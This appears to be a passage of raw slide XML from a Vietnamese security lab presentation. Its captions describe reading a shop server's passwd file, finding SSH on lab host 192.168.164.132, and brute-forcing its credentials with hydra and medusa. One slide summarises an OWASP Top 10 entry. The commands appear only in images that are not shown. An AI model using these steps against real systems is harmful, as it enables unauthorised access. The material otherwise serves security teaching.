            <a:off x="1042262" y="826527"/>
            <a:ext cx="6867162" cy="4888473"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9999408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59BA-149D-5BE3-C061-D6CEC6243BF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EF05015-55AE-CB1A-CD0D-76966F32E86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962EF81-BB02-548B-6EB7-BF989435B90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176</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A341D8F-89B9-96DF-189D-42ADFE86C085}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18143" y="188709"/>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Kết quả trả về trong phần Response về thư mục passwd của sever shop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAB21F5C-788F-5EF5-4312-1A29FF73DD81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="819093"/>
            <a:ext cx="4855845" cy="4512310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6767888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144D6-386A-BF12-1E88-3031684E61D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40D911D-B5E7-A3E2-3593-807CECAC41E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D1159669-3720-E56E-785A-815132FA45C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177</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94A19169-382B-F101-7801-61DE146F1A03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="31749" y="743115"/>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Như kết quả thăm dò trước đó, maý mục tiêu có địa chỉ 192.168.164.132 còn sử dụng một dịch vụ khác. Đó là dịch vụ SSH ở cổng 22</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{318E1067-4DB4-212C-F2F5-CDD8B66E2976}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="105584"/>
            <a:ext cx="7051040" cy="646331"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>3.3.4.	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Brute Force</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EC879F9-377C-AAF5-CF84-9254A117298B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1100136" y="2167279"/>
            <a:ext cx="6778625" cy="3430810"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14417869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7E8E2-B995-A3DF-B004-20C975C9124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B6A7671-60C2-CF6E-8DA6-E671CF5395F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1B4BD2E1-D7B2-2D93-94F8-F4197548A85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178</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82ECDC07-F36C-0645-1A78-176E5AFEE624}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="31748" y="14883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Qua đây ta cũng có thể khai thác dịch vụ này bằng kỹ thuật Brute Force</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2B4217E-C9D4-9A9A-3EA8-79355EB4AE03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1627428" y="1177317"/>
            <a:ext cx="5889144" cy="4537679"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2528773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E337E-1B72-3E19-B1B8-3047F1B247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87F33A-E9FA-D92E-CA5C-1E762C08056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36091EF4-7982-EABC-5207-9D2388A2586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179</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{970A12D3-BD17-61EE-6267-CD7AB0B98991}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="31748" y="148833"/>
            <a:ext cx="8915400" cy="1592743"/>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Sử dụng hydra ta kiểm tra tìm user và password của tài khoản này thông qua lệnh: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" b="1"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Báo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>lỗi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>SSHkey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>đã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>lỗi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thời</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1ECDF313-A1E4-98FD-C71D-771BE1D45C70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="211095" y="1761141"/>
            <a:ext cx="8556705" cy="4164381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128208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BF46-EF80-204B-57E2-0F9C8C1B36B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3036EDC-D319-FF33-EA40-6038BCB48EAF}"/>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F3198EE-7593-E486-2BB5-B5B1ADADA78F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535940" y="295478"/>
            <a:ext cx="8455660" cy="2598147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>1.3.2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Phân</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>tích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>hổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>chính</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>trong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> OWASP Top 10-2021</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F4663524-5BB9-CDBB-A527-45D77A4D35D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a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB5C1A35-6960-1348-C572-9FB340EA80A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226541" y="1969322"/>
            <a:ext cx="4808357" cy="279820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2500" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>A02:2021-Cryptographic Failures (Lỗi mã hóa): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Lỗ hổng này được đổi tên từ "Sensitive Data Exposure" để tập trung vào nguyên nhân gốc rễ là các lỗi trong mã hóa, thường dẫn đến việc lộ dữ liệu nhạy cảm.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7172" name="Picture 4" descr="OWASP Top 10 security vulnerabilities 2021 Evalian®">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12F55D35-7F27-E553-E858-79E605E6C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20294"/>
            <a:ext cx="3923030" cy="385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0073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9F01-257D-69BF-D6FA-C39C09B4E64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ABBA655-F826-9A8B-4870-632D59B44C4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74ABEF5C-1139-B60F-3498-72E43EED6AD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180</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E32395FC-EBF0-BE0B-AFD6-E903368718DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="31748" y="148833"/>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Ta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>có thể sử dụng medusa tool để tấn công </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>nhưng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>khai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>không</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>nhanh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>bằng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> hydra.</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Để biết thông tin các tham số ta truyền vào tham số -help</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B442302-600E-DEF9-0D69-82FEB20EC113}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1879280" y="1809328"/>
            <a:ext cx="5220335" cy="3804285"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3464606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F89AD-EFFA-B5F6-BF24-FBC753FC695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4DC4AB2-A352-378C-882E-255F9E004944}"/>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9D0CFA3-8111-1AA8-0EB6-9FC81CE1D6C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181</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAD6BDE7-CD67-0430-C5C0-ECA2AD3F0E83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="31748" y="14883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Tiến </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>hành</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>dùng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> medusa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> brute force </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>bằng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>câu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51FBD54A-925C-2A56-077F-E60E591CDD0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="56462" y="2286000"/>
            <a:ext cx="9020739" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2EF8078-CEB3-DF7E-58DB-03BB370C94E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="1436393"/>
            <a:ext cx="6705600" cy="708615"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
